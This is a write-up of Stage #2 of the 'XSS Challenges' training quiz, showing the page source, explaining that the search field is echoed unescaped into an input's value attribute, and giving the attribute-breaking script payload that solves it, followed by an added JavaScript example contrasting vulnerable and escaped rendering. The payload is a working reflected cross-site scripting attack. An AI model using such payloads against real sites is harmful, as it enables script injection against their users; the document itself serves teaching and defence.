In this stage, the page echoes the submitted input back as-is.
Let's look at the page source.
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=euc-jp">
<link rel="stylesheet" type="text/css" href="style.css">
<script language="JavaScript" type="text/javascript" src="script.js"></script>
<title>XSS Challenges (by yamagata21) - Stage #2</title>
</head>
<body><div>
<h1>XSS Challenges</h1> <!-- Cross Site Scripting (XSS) Quiz -->
<h2>Stage #2</h2>
<b>What you have to do:</b><br>
Inject the following JavaScript command: <code>alert(document.domain);</code><p>
<b>Hint:</b> <span id="hide">close the current tag and add SCRIPT tag...</span>
<input type="hidden" name="key" value="tubhf.4/qiq">
<form action="?sid=c76be95ebd68c6734f402f2fc3ddaeb819d57eb5" method="post">
<hr class=red>Search: <input type="text" name="p1" size="60" value=""> <input type="submit" value="Search">
<hr class=red>
</form>
<span id="msg" style="display:none"></span>
<p><hr>
This page was written by yamagata21,
inspired by <a href="http://blogged-on.de/xss/" target=_new>http://blogged-on.de/xss/</a>.
</div>
<!-- Google Analytics / *** THIS IS NOT A TARGET. PLEASE LAY OFF! *** -->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-53066-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>
<!-- Google Analytics / *** THIS IS NOT A TARGET. PLEASE LAY OFF! *** -->
</body>
</html>
Hint: close the current tag and add SCRIPT tag...
The hint tells us to close the current tag.
<hr class=red>Search: <input type="text" name="p1" size="60" value=""> <input type="submit" value="Search">
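Whatever is typed into the search box is placed into the value attribute unchanged.
The tag the hint tells us to close appears to be the one holding this value: the input has to end the value attribute and the input tag first.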
"><script>alert(document.domain);</script>
Submitting this input made the attack succeed.
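The reflection into value described above, next to an encoded version, as an added example that is not part of the original post or the challenge's server code. The function names are hypothetical, and the small tag scanner is only a check for this one input field, not a full HTML parser.

```javascript
// Added example: how the Stage #2 search field could be rendered server-side.
// All function names are hypothetical; the challenge's real server code is not on the page.

// Payload from the write-up above.
const PAYLOAD = '"><script>alert(document.domain);</script>';

// Vulnerable: p1 is concatenated straight into the value="..." attribute.
function renderSearchVulnerable(p1) {
  return '<input type="text" name="p1" size="60" value="' + p1 + '">';
}

// Encode the characters that can end a quoted attribute or start a tag.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: the same template, with the value encoded for an attribute context.
function renderSearchSafe(p1) {
  return '<input type="text" name="p1" size="60" value="' + escapeHtml(p1) + '">';
}

// List the tags that open outside double-quoted attribute values.
// A '<' inside value="..." is data; a '<' after the attribute was closed is markup.
function tagNames(html) {
  const names = [];
  let state = 'text';
  for (let i = 0; i < html.length; i++) {
    const c = html[i];
    if (state === 'text' && c === '<') {
      const m = /^\/?[a-zA-Z][a-zA-Z0-9]*/.exec(html.slice(i + 1));
      if (m) { names.push(m[0].toLowerCase()); state = 'tag'; }
    } else if (state === 'tag') {
      if (c === '"') state = 'attr';
      else if (c === '>') state = 'text';
    } else if (state === 'attr' && c === '"') {
      state = 'tag';
    }
  }
  return names;
}

console.log('vulnerable:', tagNames(renderSearchVulnerable(PAYLOAD)));
console.log('safe:      ', tagNames(renderSearchSafe(PAYLOAD)));
```

In the encoded version the browser still shows the original characters in the search box, because entities inside an attribute value are decoded as text and never parsed as markup.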